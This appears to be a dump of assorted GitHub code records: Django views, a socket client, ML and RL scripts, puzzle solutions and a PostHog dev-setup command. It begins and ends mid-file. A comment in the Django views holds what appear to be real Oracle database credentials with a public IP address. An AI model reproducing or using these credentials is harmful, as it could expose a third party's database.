gabinet_data = { \"Name\": data['result']['subject']['name'],\n \"NIP\": nip,\n \"REGON\": data['result']['subject']['regon'],\n \"Address\": address }\n return gabinet_data\n else:\n traceback.print_exc() \n raise Exception(\"Error\")\n\n# # gabinet_data = { \"Name\": \"Company name\",\n# # \"NIP\": nip,\n# # \"REGON\": \"2022-05-02\",\n# # \"Address\": \"Małopanewska 4, 8/1 Białystok\" }\n# return gabinet_data\n\n\n","repo_name":"YahorNovik/bot","sub_path":"bot/parser_folder/parser_code.py","file_name":"parser_code.py","file_ext":"py","file_size_in_byte":4702,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"6626248798","text":"# exercise here\nimport sys\nfrom functools import reduce\n\n\ndef counter():\n print(list(zip(sys.argv[1:], map(count_lines_in_file, sys.argv[1:]))))\n print(\"The total number of lines is {}\".format(total_lines()))\n\n\ndef count_lines_in_file(filename):\n \"\"\"\n Counts the number of lines in a file.\n \"\"\"\n try:\n with open(filename) as f:\n return len(f.readlines())\n except FileNotFoundError:\n print(\"File is not exist!\")\n return -1\n\n\ndef total_lines():\n \"\"\"\n Counts the number of lines in all files.\n \"\"\"\n return reduce(lambda x, y: x + y, list(map(count_lines_in_file, sys.argv[1:])))\n\n\nif __name__ == '__main__':\n counter()\n","repo_name":"exba99/ShakespeareProject","sub_path":"countlines.py","file_name":"countlines.py","file_ext":"py","file_size_in_byte":685,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32090445090","text":"from django.shortcuts import render\nimport cx_Oracle\nfrom django.db import transaction,connections\nfrom datetime import datetime\nfrom django.http import HttpResponseRedirect,JsonResponse,HttpResponse\nfrom django.contrib.auth import login as auth_login,logout,authenticate\nfrom django.urls import reverse\nfrom django.shortcuts import render,redirect\nfrom app_cc.models import *\n\n# Create your views here.\ndef login(request):\n\tmensaje = ''\n\tif request.user.is_authenticated:\n\t\treturn HttpResponseRedirect(reverse('app_cc:lista_colaborador'))\n\t\n\tif request.method == 'POST':\n\t\tusername = request.POST.get('usuario')\n\t\tcontrasenia = request.POST.get('contrasenia')\n\t\tuser = authenticate(username=username,password=contrasenia)\n\t\tif user is not None:\n\t\t\tif user.is_active:\n\t\t\t\tauth_login(request,user)\n\t\t\t\treturn redirect('app_cc:lista_colaborador')\n\t\t\telse:\n\t\t\t\tmensaje = 'USUARIO INACTIVO'\n\t\t\t\treturn render(request,'login.html',{'mensaje':mensaje})\n\t\telse:\n\t\t\tmensaje = 'USUARIO O CONTRASEÑA INCORRECTA'\n\t\t\treturn render(request,'login.html',{'mensaje':mensaje})\n\treturn render(request,'login.html',{'mensaje':mensaje})\n\ndef cerrar_sesion(request):\n\tlogout(request)\n\treturn HttpResponseRedirect(reverse('app_cc:login'))\n\n\ndef index(request):\n\tconsulta = Colaborador.objects.all()\n\tgeneros = Genero.objects.all()\n\tdata = {'lista_colaborador':consulta,'generos':generos}\n\treturn render(request, \"index.html\",data)\n# try:\n# conexion=cx_Oracle.connect(\"jaguaroracle\", \"Jaguar2021\", \"173.249.59.89:1521/xe\")\n# except Exception as error:\n# print (\"nel .Error: \"+error)\n# else: \n# print(\"Si!!!!\")\n\ndef lista_colaborador(request):\n\tconsulta = Colaborador.objects.all()\n\tgeneros = Genero.objects.all()\n\tdata = {'lista_colaborador':consulta,'generos':generos}\n\treturn render(request,'index.html',data)\n\n\ndef registrar_colaborador(request):\n\tguardar_editar = True\n\tgeneros = Genero.objects.all()\n\tret_data,query_colaborador,errores = {},{},{}\n\n\tif request.method == 'POST':\n\t\tprint(\"ESTAMOS EN EL METODO POST\")\n\t\tret_data['identificacion'] = request.POST.get('identificacion')\n\t\tret_data['nombres'] = request.POST.get('nombres')\n\t\tret_data['apellidos'] = request.POST.get('apellidos')\n\t\tret_data['telefono'] = request.POST.get('telefono')\n\t\tret_data['fecha_nacimiento'] = request.POST.get('fecha_nacimiento')\n\t\tret_data['genero'] = int(request.POST.get('genero'))\n\t\tif request.POST.get('identificacion') == '':\n\t\t\terrores['identificacion'] = \"DEBES INGRESAR LA IDENTIDAD\"\n\t\telse:\n\t\t\tquery_colaborador['identificacion'] = request.POST.get('identificacion')\n\t\t\n\t\tif request.POST.get('nombres') == '':\n\t\t\terrores['nombres'] = \"DEBES INGRESAR NOMBRES\"\n\t\telse:\n\t\t\tquery_colaborador['nombres'] = request.POST.get('nombres')\n\n\t\tquery_colaborador['apellidos'] = request.POST.get('apellidos')\n\t\tquery_colaborador['telefono'] = request.POST.get('telefono')\n\t\tquery_colaborador['fecha_nacimiento'] = request.POST.get('fecha_nacimiento')\n\t\tquery_colaborador['Genero'] = Genero.objects.get(pk=request.POST.get('genero'))\n\n\t\tif not errores:\n\t\t\ttry:\n\t\t\t\tcolaborador = Colaborador(**query_colaborador)\n\t\t\t\tcolaborador.save()\n\t\t\texcept Exception as e:\n\t\t\t\ttransaction.rollback()\n\t\t\t\tprint (e)\n\t\t\t\terrores['administrador'] = e\n\t\t\t\tctx = {'generos':generos,\n\t\t\t\t\t\t'errores':errores,\n\t\t\t\t\t\t'ret_data':ret_data,\n\t\t\t\t\t\t'guardar_editar':guardar_editar}\n\t\t\t\treturn render(request,'registrar_colaborador.html',ctx)\n\t\t\telse:\n\t\t\t\ttransaction.commit()\n\t\t\t\treturn HttpResponseRedirect(reverse('app_cc:lista_colaborador'))\n\t\telse:\n\t\t\tctx = {'generos':generos,\n\t\t\t\t\t'errores':errores,\n\t\t\t\t\t'ret_data':ret_data,\n\t\t\t\t\t'guardar_editar':guardar_editar}\n\t\t\treturn render(request,'registrar_colaborador.html',ctx)\n\telse:\n\t\tprint(\"ESTAMOS EN EL METODO GET\")\n\t\tctx = {'generos':generos,'guardar_editar':guardar_editar}\n\t\treturn render(request,'registrar_colaborador.html',ctx)\n\ndef eliminar_colaborador(request,id_colaborador):\n\teliminar = Colaborador.objects.get(pk=id_colaborador).delete()\n\treturn HttpResponseRedirect(reverse('app_cc:lista_colaborador'))\n\ndef modificar_colaborador(request,id_colaborador):\n\tconsulta = Colaborador.objects.all()\n\tgeneros = Genero.objects.all()\n\tguardar_editar = False\n\tcolaborador = Colaborador.objects.get(pk=id_colaborador)\n\tret_data,query_colaborador,errores = {},{},{}\n\n\tif request.method=='POST':\n\t\tprint(\"aqui va modificar\")\n\n\t\tif request.POST.get('identificacion') == '' or request.POST.get('nombres') == '' or request.POST.get('apellidos') == '' or request.POST.get('telefono') == '' or request.POST.get('fecha_nacimiento') == '' or int(request.POST.get('genero')) == 0:\n\t\t\terrores['identificacion'] = \"HAY ERRORES\"\n\n\t\tif not errores:\n\t\t\t\n\t\t\ttry:\n\t\t\t\tcolaborador = Colaborador.objects.filter(pk=id_colaborador).update(identificacion=request.POST.get('identificacion'),\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tnombres=request.POST.get('nombres'),\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tapellidos=request.POST.get('apellidos'),\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\ttelefono=request.POST.get('telefono'),\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tfecha_nacimiento=request.POST.get('fecha_nacimiento'),\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tGenero=request.POST.get('genero')\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t)\n\n\t\t\texcept Exception as e:\n\t\t\t\tprint(e )\n\t\t\t\treturn HttpResponseRedirect(reverse('app_cc:lista_colaborador')+\"?error\")\n\t\t\telse:\n\t\t\t\treturn HttpResponseRedirect(reverse('app_cc:lista_colaborador'))\n\t\telse:\n\t\t\treturn HttpResponseRedirect(reverse('app_cc:lista_colaborador')+\"?error\")\n\telse:\n\t\treturn HttpResponseRedirect(reverse('app_cc:lista_colaborador'))\n","repo_name":"AndreaOrt/proyecto_cc","sub_path":"app_cc/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5482,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38687855656","text":"from socket import *\r\nfrom constCS import *\r\n\r\ns = socket(AF_INET, SOCK_STREAM)\r\ns.connect((HOST, PORT))\r\n\r\ndata = s.recv(1024)\r\nprint(bytes.decode(data))\r\n\r\nwhile True:\r\n cmd = input()\r\n if cmd == 'sair': break\r\n\r\n s.send(str.encode(cmd))\r\n data = s.recv(1024)\r\n print(bytes.decode(data))\r\n \r\ns.close()","repo_name":"DistributedSystems-UFG/client-server-basics----with-sockets-VictorGNetto","sub_path":"client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":322,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32313034481","text":"#!/usr/bin/env python\n\nimport mpl_toolkits # import before pathlib\nimport sys\nimport pathlib\nimport gc\nfrom typing import Optional\n\nfrom sklearn.neighbors import NearestNeighbors\nfrom tensorflow import set_random_seed\n\n# sys.path.append(pathlib.Path(__file__).parent)\nfrom train_utils import *\nfrom model import *\nfrom dataset import *\n\nnp.random.seed(RANDOM_NUM)\nset_random_seed(RANDOM_NUM)\n\nOUTPUT_FILE = 'test_dataset_prediction.txt'\n\n# BASE_MODEL = 'vgg19'\n# BASE_MODEL = 'incepstionresnetv2'\n# BASE_MODEL = 'resnet50'\n# BASE_MODEL = 'resnet152'\n# BASE_MODEL = 'adams'\n# BASE_MODEL = 'michel'\n# BASE_MODEL = 'mobilenet'\n# BASE_MODEL = 'local'\n# BASE_MODEL = 'giim'\n# BASE_MODEL = 'siamese'\n# BASE_MODEL = 'triplet_loss'\nBASE_MODEL = 'martine'\nif BASE_MODEL == 'resnet50':\n create_model = create_model_resnet50_plain\nelif BASE_MODEL == 'resnet152':\n create_model = create_model_resnet152_plain\nelif BASE_MODEL == 'incepstionresnetv2':\n create_model = create_model_inceptionresnetv2_plain\nelif BASE_MODEL == 'mobilenet':\n create_model = create_model_mobilenet\nelif BASE_MODEL == 'giim':\n create_model = create_model_giim\nelif BASE_MODEL == 'siamese':\n create_model = create_model_siamese\nelif BASE_MODEL == 'siamese_resnet':\n create_model = create_model_siamese_resnet\nelif BASE_MODEL == 'triplet_loss':\n create_model = create_model_triplet_loss\nelif BASE_MODEL == 'martine':\n create_model = create_martine_model\nelse:\n raise Exception(\"unimplemented model\")\n\n\ndef test(dataset: Optional[Dataset], model: Optional[Model]):\n if dataset is None:\n dataset = load_raw_data()\n test_dataset = load_test_data()\n weight_param_path = f\"model/{BASE_MODEL}.weights.best.hdf5\"\n if model is None:\n model = create_model(dataset=dataset, input_shape=(IMAGE_SIZE, IMAGE_SIZE, IMAGE_DIM))\n model = build_model(model, weight_param_path)\n train_preds = []\n train_data_list = []\n for data_unit in dataset.data_list:\n if data_unit.answer == NEW_LABEL:\n continue\n x = create_unit_dataset(dataset, data_unit)\n predicts = model.submodel.predict([x])\n predicts = predicts.tolist()\n train_preds += predicts\n train_data_list.append(data_unit)\n train_preds = np.array(train_preds)\n print(f\"train_preds:{train_preds.shape}\")\n print(f\"train_preds:{train_preds}\")\n\n test_preds = []\n test_data_list = []\n for data_unit in test_dataset.data_list:\n x = create_unit_dataset(dataset, data_unit)\n predicts = model.submodel.predict(x)\n predicts = predicts.tolist()\n test_preds += predicts\n test_data_list.append(data_unit)\n test_preds = np.array(test_preds)\n print(f\"test_preds: {test_preds.shape}\")\n print(f\"test_preds:{test_preds}\")\n\n neigh = NearestNeighbors(n_neighbors=6)\n neigh.fit(train_preds)\n # distances, neighbors = neigh.kneighbors(train_preds)\n # print(distances, neighbors)\n distances_test, neighbors_test = neigh.kneighbors(test_preds)\n distances_test, neighbors_test = distances_test.tolist(), neighbors_test.tolist()\n\n df = pd.DataFrame([], columns=['Image', 'Id'])\n for data_unit, distance, neighbour_ in zip(test_data_list, distances_test, neighbors_test):\n sample_result = []\n sample_classes = []\n for d, n in zip(distance, neighbour_):\n train_data_unit = train_data_list[n]\n sample_classes.append(train_data_unit.answer)\n sample_result.append((train_data_unit.answer, d))\n\n if NEW_LABEL not in sample_classes:\n # pbr\n # sample_result.append((NEW_LABEL, 0.0002))\n # alpha\n sample_result.append((NEW_LABEL, 27))\n sample_result.sort(key=lambda x: x[1])\n print(f\"sample:{sample_result}\")\n sample_result = sample_result[:5]\n pred_str = \" \".join([x[0] for x in sample_result])\n df = df.append(pd.DataFrame([[data_unit.filename, pred_str]], columns=['Image', 'Id']),\n ignore_index=True)\n df.to_csv(OUTPUT_FILE, index=False)\n\n\ndef main():\n dataset = load_raw_data()\n\n print(f\"class_num:{dataset.class_num}\")\n weight_param_path = f\"model/{BASE_MODEL}.weights.best.hdf5\"\n model = create_model(dataset=dataset, input_shape=(IMAGE_SIZE, IMAGE_SIZE, IMAGE_DIM))\n model = build_model(model, weight_param_path)\n # model = create_martine_model()\n for i in range(0, 1):\n print(f\"num:{i}. start train\")\n train_model(model, dataset, weight_param_path)\n model.save(weight_param_path)\n test(dataset, model)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"photom/histopathologic_cancer_detection","sub_path":"src/trainer_martine.py","file_name":"trainer_martine.py","file_ext":"py","file_size_in_byte":4628,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39728495650","text":"#!/usr/bin/env python3\n#\n#euler39 / Integer right triangles\nresult_max=0\np_max=0\nfor p in range(1,1001):\n result=0\n for a in range(1,p):\n for b in range(a,p):\n if a**2+b**2==(p-a-b)**2:\n result+=1\n print(a,b,p-a-b,p)\n if result > result_max:\n result_max=result\n p_max=p\nprint(p_max,result_max)\n","repo_name":"allagonne/Euler_project","sub_path":"euler39.py","file_name":"euler39.py","file_ext":"py","file_size_in_byte":389,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"33228011187","text":"from django.urls import path\nfrom . import views\n\n\nurlpatterns = [\n path('', views.dashboard, name=\"dashboard\"),\n path('loginteacher/', views.loginPageT, name=\"login\"),\n path('logout/', views.logoutUser, name=\"logout\"),\n\n \n path('teacher/',views.teacher, name=\"teacher\"),\n path('add_lang/',views.addLang, name=\"add_lang\"),\n path('create_group/',views.createGroupView, name=\"create_group\"),\n path('Updatestudent/',views.updateStudentView, name=\"Updatestudent\"),\n\n path('registerteacher/', views.registerPageT, name=\"registerteacher\"),\n path('registerstudent/',views.registerPageS, name=\"registerstudent\"),\n path('assginstudent/',views.assginStudent, name=\"assginstudent\"),\n \n path('teacher_group/',views.group, name=\"teacher_group\"),\n path('studentslist/',views.groupStudentsAPI), \n path('student_present/',views.studentPresent), \n path('student_absent/',views.studentAbsent), \n path('sub_session/',views.sessionSub), \n\n\n path('student_search/',views.studentSearch, name=\"student_search\"),\n \n \n \n \n \n \n\n ]","repo_name":"toufik2015/sapp","sub_path":"SAPP/accounts/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1112,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"25319970706","text":"# is one range inside of the other?\n# start has to be greater than or equal\n# end has to be less than or equal\n\n# determine which of the pair has the greater start:\n# does it come on or before the other's end?\n# is its end it less than or equal to the other's end?\n\n# if starts or finish are the same, one will contain the other no matter what\n\nwastedAssignments = 0\n\nwith open('input.txt') as inputFile:\n for assignments in inputFile:\n [a, b] = assignments.split(',')\n a = list(map(int, a.split('-')))\n b = list(map(int, b.split('-')))\n if a[0] == b[0] or a[1] == b[1]:\n wastedAssignments += 1\n else:\n firstAssignment = a\n secondAssignment = b\n if a[0] > b[0]:\n firstAssignment = b\n secondAssignment = a\n\n firstAssignmentLength = (firstAssignment[1] - firstAssignment[0])\n secondAssignmentLength = (secondAssignment[1] - secondAssignment[0])\n startGap = secondAssignment[0] - firstAssignment[0]\n \n if (secondAssignment[0] < firstAssignment[1]) and (firstAssignmentLength - startGap >= secondAssignmentLength):\n wastedAssignments += 1\n\nprint(wastedAssignments)","repo_name":"tonymckendry/AdventOfCode2022","sub_path":"day4/day4Pt1.py","file_name":"day4Pt1.py","file_ext":"py","file_size_in_byte":1142,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10381386508","text":"import glob \nimport os\nimport numpy as np\n\nclass Loader:\n def __init__(self, data_dir):\n self.data_dir = data_dir\n\n def convert_to_time(self, tstamp):\n tstamp = tstamp.split(':')\n return float(tstamp[0])*3600 + float(tstamp[1])*60 + float(tstamp[2])\n\n def iterate(self):\n with open(os.path.join(self.data_dir, 'num_files')) as f:\n num_files = int(f.readline())\n\n for i in xrange(num_files):\n feats = np.load(os.path.join(self.data_dir, 'feats{}.npy'.format(i)))\n labels = np.load(os.path.join(self.data_dir, 'labels{}.npy'.format(i)))\n feats = np.expand_dims(feats, 0)\n yield feats, labels\n","repo_name":"kalpitdixit/ACM","sub_path":"loader.py","file_name":"loader.py","file_ext":"py","file_size_in_byte":691,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39511278149","text":"from django.core.management.base import BaseCommand\nfrom django.db import transaction\n\nfrom posthog.demo.legacy import ORGANIZATION_NAME, TEAM_NAME, create_demo_data\nfrom posthog.models import (\n EventProperty,\n PersonalAPIKey,\n Plugin,\n PluginConfig,\n PluginSourceFile,\n Team,\n User,\n)\nfrom posthog.models.event_definition import EventDefinition\nfrom posthog.models.personal_api_key import hash_key_value\nfrom posthog.models.property_definition import PropertyDefinition\n\n\nclass Command(BaseCommand):\n help = \"Set up the instance for development/review with demo data\"\n\n def add_arguments(self, parser):\n parser.add_argument(\"--no-data\", action=\"store_true\", help=\"Create demo account without data\")\n parser.add_argument(\n \"--create-e2e-test-plugin\",\n action=\"store_true\",\n help=\"Create plugin for charts E2E test\",\n )\n\n def handle(self, *args, **options):\n print(\"\\n⚠️ setup_dev is deprecated. Use the more robust generate_demo_data command instead.\\n\") # noqa T201\n with transaction.atomic():\n _, team, user = User.objects.bootstrap(\n organization_name=ORGANIZATION_NAME,\n email=\"test@posthog.com\",\n password=\"12345678\",\n first_name=\"Jane Doe\",\n is_staff=True,\n team_fields={\n \"name\": TEAM_NAME,\n \"api_token\": \"e2e_token_1239\",\n \"completed_snippet_onboarding\": True,\n \"ingested_event\": True,\n },\n )\n EventDefinition.objects.create(team=team, name=\"$pageview\")\n EventDefinition.objects.create(team=team, name=\"$autocapture\")\n self.add_property_definition(team, \"$current_url\")\n self.add_property_definition(team, \"$browser\")\n self.add_property_definition(team, \"$os\")\n self.add_property_definition(team, \"usage_count\")\n self.add_property_definition(team, \"volume\")\n self.add_property_definition(team, \"is_first_movie\")\n PropertyDefinition.objects.create(name=\"name\", type=PropertyDefinition.Type.PERSON, team=team)\n PropertyDefinition.objects.create(name=\"is_demo\", type=PropertyDefinition.Type.PERSON, team=team)\n\n PersonalAPIKey.objects.create(\n user=user,\n label=\"e2e_demo_api_key key\",\n secure_value=hash_key_value(\"e2e_demo_api_key\"),\n )\n if not options[\"no_data\"]:\n create_demo_data(team)\n\n if options[\"create_e2e_test_plugin\"]:\n self.create_plugin(team)\n\n @staticmethod\n def add_property_definition(team: Team, property: str) -> None:\n PropertyDefinition.objects.create(team=team, name=property)\n EventProperty.objects.create(team=team, event=\"$pageview\", property=property)\n EventProperty.objects.create(team=team, event=\"$autocapture\", property=property)\n\n def create_plugin(self, team):\n plugin = Plugin.objects.create(organization=team.organization, name=\"e2e test plugin\", plugin_type=\"source\")\n plugin_config = PluginConfig.objects.create(plugin=plugin, team=team, order=1, config={})\n\n PluginSourceFile.objects.update_or_create(\n plugin=plugin,\n filename=\"plugin.json\",\n source='{ \"name\": \"e2e test plugin\", \"config\": [] }',\n )\n PluginSourceFile.objects.update_or_create(\n plugin=plugin,\n filename=\"index.ts\",\n source=\"\"\"\n export async function onEvent(event, meta) {\n const ratelimit = await meta.cache.get('ratelimit')\n if (!ratelimit && event.event !== '$pluginEvent') {\n posthog.capture('$pluginEvent', { event: event.event })\n await meta.cache.set('ratelimit', 1)\n await meta.cache.expire('ratelimit', 60)\n }\n }\n \"\"\",\n )\n\n plugin_config.enabled = True\n plugin_config.save()\n","repo_name":"PostHog/posthog","sub_path":"posthog/management/commands/setup_dev.py","file_name":"setup_dev.py","file_ext":"py","file_size_in_byte":4149,"program_lang":"python","lang":"en","doc_type":"code","stars":14422,"dataset":"github-code","pt":"53"} +{"seq_id":"595263349","text":"### LAST ITERATION\n### ITER-5\n\n### comments are written for better understanding.....!\n\nimport cv2\nimport numpy as np\nimport time\nfrom tqdm import tqdm\n\ndef compute_norm(arr):\n nume = arr-arr.mean()\n deno = np.sqrt((nume**2).sum())\n return nume/deno\n\nmax_ssd = 10\nmax_d = 15\n# width = 10\nhb = 4\ncost = 100\n# height = 3\n# comps = width -2*hb + 2\n# left= np.random.randint(0,34,size = (height,width))\n# right = np.roll(left, -2,axis = 1)\n\nprint(\"Block size is \",2*hb+1)\nprint(\"Max disparity is \",max_d)\n\nleft = cv2.imread(\"Inputs/tsukuba_l.png\",0)\nright = cv2.imread(\"Inputs/tsukuba_r.png\",0)\n\nheight, width = left.shape\n\ndisparity_img = np.zeros(shape = (height,width))\n\n# print(\"Left is \\n\",left)\n# print(\"Right is \\n\",right)\n\ntik = time.time()\n\n# iterate thru height.!\nfor h in tqdm(range(hb,height-hb)):\n# print(h)\n lshift = 0\n DSI = np.zeros(shape = (width-2*hb,max_d))\n # print(\"DSI shape is \",DSI.shape, h)\n #for every height, u need a DSI so u init it \n for w in range(hb,width-hb):\n if (w-hb)>=max_d: lshift+=1\n # for every pixel in left-img, scan upto dmax and compute ssd, fill this ssd inside DSI\n for d in range(0,max_d):\n rshift = w-d-hb\n if(rshift>=0):\n left_patch = left[h-hb:h+hb+1,w-hb:w+hb+1].copy()\n right_patch = right[h-hb:h+hb+1,w-hb-rshift+lshift:w+hb+1-rshift+lshift].copy()\n# print(\"Left-patch is \\n{}\\nRigth patch is \\n{}\".format(left_patch,right_patch))\n ssd = ((compute_norm(left_patch)-compute_norm(right_patch))**2).sum()\n# print(\"SSD is {}\\n\".format(ssd))\n\n index = rshift-lshift\n else:\n index = d\n ssd = max_ssd\n pass\n DSI[w-hb,index] = ssd\n \n DSI[DSI==0] = np.inf\n \n for i in range(1,DSI.shape[0]):\n for j in range(i,min(DSI.shape[1],i+max_d)):\n DSI[i,j-i] = DSI[i,j-i] + min(DSI[i-1,:] + cost*np.abs(np.arange(0,DSI.shape[1])-(i-j)))\n\n\n# curr_id = np.argmin(DSI[-1])\n# curr_cost = DSI[-1,curr_id]\n# # print(curr_cost)\n# l = [curr_id]\n# # print(l)\n# for row in range(DSI.shape[0]-2,-1,-1):\n# # print(M[row],np.abs(curr_cost-M[row]))\n# curr_id = np.argmin(np.abs(curr_cost-DSI[row]))\n# curr_cost = DSI[row,curr_id]\n# l.append(curr_id) \n \n # c = np.zeros(DSI.shape[0])\n # for i in range(DSI.shape[0]-1,-1,-1):\n # b = np.argmin(DSI[i,:])\n # c[i] = i\n\n disparity_img[h,hb:-hb] = np.argmin(DSI, axis = 1)\n # disparity_img[h,hb:-hb] = c\n\n# print(\"One pixel disparity compared at\\n\")\n# print(np.round(DSI,decimals = 2).T)\n\nprint(\"Time took \",time.time()-tik)\n\nfinal_img = ((disparity_img/disparity_img.max())*255).astype(np.uint8)\n\ncv2.imwrite(\"Outputs/Disparity_dynamic.png\",final_img)\n\ncv2.imshow(\"final\",final_img)\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n","repo_name":"ChetanPatil28/Epipolar-Geometry","sub_path":"Stereo_Correspondence/Dynamic.py","file_name":"Dynamic.py","file_ext":"py","file_size_in_byte":2946,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"23787157531","text":"#!/usr/bin/env python3\n# coding: utf-8\n#\n# This is a drystal developer tool, it is not intended to help game developpers.\n\nfrom runner import *\nimport itertools\nimport random\n\n\nprefix = 'BUILD_'\nconfigs = {\n'UTILS': [],\n'GRAPHICS': [],\n'STORAGE': ['UTILS'],\n'AUDIO': [],\n'FONT': ['GRAPHICS'],\n'WEB': [],\n'PARTICLE': ['GRAPHICS'],\n'PHYSICS': [],\n}\nconfigs_names = ['UTILS', 'GRAPHICS', 'STORAGE', 'AUDIO', 'FONT', 'WEB', 'PARTICLE', 'PHYSICS']\n\ndef get_index_of(v):\n for i, c in enumerate(configs_names):\n if c == v:\n return i\n return -1\n\n\ndef get_boolean_permutations():\n permutations = set()\n permutations_tmp = list(itertools.product([True, False], repeat=len(configs)))\n for p in permutations_tmp:\n pl = list(p)\n for i, v in enumerate(p):\n if v:\n for dep in configs[configs_names[i]]:\n pl[get_index_of(dep)] = True\n permutations.add(tuple(pl))\n\n return permutations\n\n\ndef get_defines_permutations():\n boolean_permutations = get_boolean_permutations()\n defines_permutations = []\n for p in boolean_permutations:\n defines = []\n for i, b in enumerate(p):\n if b:\n defines.append(prefix + configs_names[i] + '=YES')\n else:\n defines.append(prefix + configs_names[i] + '=NO')\n defines_permutations.append(defines)\n\n random.shuffle(defines_permutations)\n return defines_permutations\n\n\ndef run_web(args):\n defines_permutations = get_defines_permutations()\n nperm = str(len(defines_permutations))\n print(I + 'Building '+ nperm + ' permutations...')\n for i, d in enumerate(defines_permutations):\n print(I + 'Permutation ' + str(i + 1) + '/' + nperm)\n cmake_update('build-web', EMSCRIPTEN_CMAKE_DEFINES + d, True)\n\n\ndef run_native(args):\n build_type = 'Debug'\n directory = BUILD_NATIVE_DEBUG\n if args.release:\n build_type = 'Release'\n directory = BUILD_NATIVE_RELEASE\n defines_permutations = get_defines_permutations()\n nperm = str(len(defines_permutations))\n print(I + 'Building '+ nperm + ' permutations...')\n for i, d in enumerate(defines_permutations):\n print(I + 'Permutation ' + str(i + 1) + '/' + nperm)\n cmake_update(directory, ['CMAKE_BUILD_TYPE=' + build_type] + NATIVE_CMAKE_DEFINES + d, True)\n\n\nif __name__ == '__main__':\n import argparse\n\n add_signal_handlers()\n\n parser = argparse.ArgumentParser(description='Drystal: build\\'em all! Try to build every permutations of compilation flags BUILD_***')\n subparsers = parser.add_subparsers(help='sub-commands')\n\n parser_native = subparsers.add_parser('native', help='native builds',\n description='native builds')\n parser_native.set_defaults(func=run_native)\n parser_native.add_argument('-r', '--release', help='compile in release mode',\n action='store_true', default=False)\n\n parser_web = subparsers.add_parser('web', help='web builds',\n description='web builds')\n parser_web.set_defaults(func=run_web)\n parser_web.add_argument('-d', '--destination', help='folder where web files will be put', default='web')\n\n args = parser.parse_args()\n args.func(args)\n\n","repo_name":"kidanger/Drystal","sub_path":"tools/builder.py","file_name":"builder.py","file_ext":"py","file_size_in_byte":3306,"program_lang":"python","lang":"en","doc_type":"code","stars":29,"dataset":"github-code","pt":"53"} +{"seq_id":"4461315276","text":"import tkinter as tk \nfrom tkinter import * \nfrom tkinter.messagebox import CANCEL, OK \n\nfrom services import player_services\n\nclass Dialog(tk.Toplevel):\n def __init__(self, parent, player_id, price=None):\n super().__init__(parent)\n self.title(\"Set Target Price\")\n frm = tk.Frame(self, borderwidth=4)\n\n player = player_services.get_player(player_id)\n\n tk.Label(frm, text=f\"Target Price for {player.name}:\").grid(row=1, column=0)\n self.price_tv = IntVar()\n if price is not None:\n self.price_tv.set(price)\n price_entry = tk.Entry(frm, textvariable=self.price_tv)\n price_entry.grid(row=1, column=1)\n\n tk.Button(frm, text=\"OK\", command=self.ok_click).grid(row=3, column=0)\n tk.Button(frm, text=\"Cancel\", command=self.cancel_click).grid(row=3, column=1)\n\n self.bind('', self.enter_pressed)\n\n self.status = CANCEL\n\n frm.pack()\n\n self.lift()\n self.focus_force()\n\n self.protocol(\"WM_DELETE_WINDOW\", self.cancel_click)\n\n price_entry.focus()\n price_entry.selection_range(0, END)\n\n self.wait_window()\n \n def enter_pressed(self, event):\n self.ok_click()\n \n def ok_click(self):\n self.price = self.price_tv.get()\n self.status = OK\n self.destroy()\n \n def cancel_click(self):\n self.price = None\n self.status = CANCEL\n self.destroy()","repo_name":"blue-shoes/ottoneu-toolbox","sub_path":"ui/dialog/draft_target.py","file_name":"draft_target.py","file_ext":"py","file_size_in_byte":1462,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"53"} +{"seq_id":"26877746955","text":"#!/usr/bin/env python3\nimport sys\nimport os\nimport numpy as np\n\nsys.path.append(os.path.abspath(os.path.join(\"../../\", \"src\")))\nimport gym\nimport argparse\nimport torch\nimport torch.nn.functional as F\nimport torch.optim as optim\nfrom tensorboardX import SummaryWriter\nimport actions\nimport agents\nimport runner\nfrom wrapper import build_env_wrapper\nimport wrapper\nimport loss\nimport config\nfrom pg_common import calculate_entropy, calculate_kl_divergence\nfrom networks import dqn_cnn_net, dqn_mlp_net\nfrom common import hyperparameters, logger, utils\nfrom memory import ExperienceReplayBuffer\n\n\nif __name__ == \"__main__\":\n # CONFIG\n params = config.PARAMS[\"cartpole\"]\n parser = argparse.ArgumentParser()\n parser.add_argument(\n \"--cuda\", default=False, action=\"store_true\", help=\"Enable Cuda\"\n )\n args = parser.parse_args()\n device = torch.device(\"cuda\" if args.cuda else \"cpu\")\n\n # INIT ENV\n env, observation_space, action_space = build_env_wrapper(\n params[\"env_name\"], env_type=params[\"env_type\"]\n )\n\n # LOGGING\n writer = SummaryWriter(comment=\"-\" + params[\"run_name\"] + \"-vpg\")\n\n # NETWORK\n net = dqn_mlp_net.Network(observation_space, action_space, hidden_layer_size=32).to(\n device\n )\n\n # AGENT\n 